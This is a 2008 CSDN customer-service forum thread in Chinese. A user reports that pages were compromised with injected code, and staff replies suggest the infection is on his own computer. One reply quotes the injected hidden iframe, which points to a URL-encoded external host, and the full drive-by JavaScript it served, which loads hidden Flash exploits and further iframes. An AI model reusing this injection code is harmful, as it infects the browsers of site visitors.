社区
客服专区
帖子详情
CSDN的安全性太差了,连续被挂马,管理员在做什么?
快乐老猫
2008-09-27 11:48:21
如题。前天、昨天连续被挂。号称中国最大的程序员网站,就如此不堪一击么?
...全文
82
5
打赏
收藏
CSDN的安全性太差了,连续被挂马,管理员在做什么?
如题。前天、昨天连续被挂。号称中国最大的程序员网站,就如此不堪一击么?
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
5 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
ptwhite
2008-10-07
打赏
举报
回复
尊敬的用户快乐老猫,您好:
根据您的反馈,我们查看了一下,并不是我们网站出现了问题,可能是您的电脑中了木马病毒,请您检查一下您的电脑,感谢您的反馈,如还有问题请再与我联系。
xueqinna
2008-10-05
打赏
举报
回复
前几天是有点问题。没想到。以后注意。
顽固己死_有事烧纸
2008-09-27
打赏
举报
回复
如此不堪一击
快乐老猫
2008-09-27
打赏
举报
回复
您好,我昨天打开论坛,金山毒霸就开始报警,包括网易、百度、CSDN、盒子论坛都有报警,google没有问题,前天CSDN、百度、盒子论坛发现病毒,当时检查了一下网页,网页的起始部分被插入了一个框架,代码如下:
<iframe src=http://%77%2E%63%39%39%78%2E%63%6E/logo.gif width=100 height=0></iframe>
金山如下日志如下:
2008-09-26 09:01:00 C:\Documents and Settings\ancl.ZJCL\Local Settings\Temporary Internet Files\Content.IE5\HTPT8PJN\logoCAEGXOX0.gif JS.Agent.ef.1349 清除成功
logo.gif 文件代码如下:
<SCRIPT LANGUAGE="javascript">
window.on_error=function(){return true;}
function init(){document.write();}
window.onload = init;
if(document.cookie.indexOf("tyeyede=")==-1)
{
var skpaopao=new Date();
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="tyeyede=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain"/>');
document.write('<param name="movie" value="ie.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="ie.swf"/>');
document.write('</object>');
}
else
{
document.write("<EMBED src=ff.swf width=0 height=0>");
}
document.writeln("<iframe src=next2.htm width=50 height=0><\/iframe>");}
</SCRIPT>
</BODY></HTML>
<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/745761/ystat.js";></script><noscript><a href="http://tongji.cn.yahoo.com";><img src="http://img.tongji.cn.yahoo.com/745761/ystat.gif";/></a></noscript>
==========================================================================================
图是没有了,金山毒霸一闪而过,没有时间截图。
ptwhite
2008-09-27
打赏
举报
回复
尊敬的用户快乐老猫,您好:
请问您是在进入哪个页面碰到这样的情况呢?能给我们发个页面的截图么?请直接与我联系:webmaster@csdn.net.
2023国赛信息安全管理与评估样题及规程解读
大家都知道该赛项的规程和样题向来都是模棱两可,从来不说具体的内容,导致选手在备赛时没有头绪,不知道该怎么训练,到了赛时发现题目和备赛的时候完全不一样!那么本文将以往年信息安全管理与评估赛项经验来解读今年2023年国赛的规程,帮助选手们指明方向,不再为备赛却没有头绪而烦恼!
信息安全工程师第二版考试总结+笔记
信息安全工程师第二版考试总结+笔记
《网络黑白》一书所抄袭的文章列表
《网络黑白》一书所抄袭的文章列表这本书实在是垃圾,一是因为它的互联网上的文章拼凑而成的,二是因为拼凑水平
太差
,连表述都一模一样,还抄得前言不搭后语,三是因为内容全都是大量的科普,不涉及技术也没有干货。所以大家也不用去买这本书,看我这份列表就行了。我相信我这篇文章一定会在前排,没有的话请大家帮忙转发,少坑一个人是一个人。作者花无涯已经有人扒了,请见: 黑什么客?看老司机一星期时间打造黑客教父! 黑客协
网络安全基础知识点汇总
相信大家都知道防火墙是干什么用的, 我觉得需要特别提醒一下,防火墙抵御的是外部的攻击,并不能对内部的病毒 ( 如ARP病毒 ) 或攻击没什么太大作用。
SSRF漏洞详解
一、SSRF概述 SSRF全称为Server-side Request Fogery,中文含义为服务器端请求伪造,漏洞产生的原因是服务端提供了能够从其他服务器应用获取数据的功能,比如从指定的URL地址获取网页内容,加载指定地址的图片、数据、下载等等。 一般情况下,我们服务端请求的目标都是与该请求服务器处于同一内网的资源服务,但是如果没有对这个请求的目标地址、文件等
做
充足的过滤和限制,攻击者可通过篡改这个请求的目标地址来进行伪造请求,所以这个漏洞名字也叫作“服务器请求伪造”。 利用SSRF能实现以下效果: 1
客服专区
542
社区成员
48,807
社区内容
发帖
与我相关
我的任务
客服专区
客服专区
复制链接
扫一扫
分享
社区描述
客服专区
其他
技术论坛(原bbs)
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章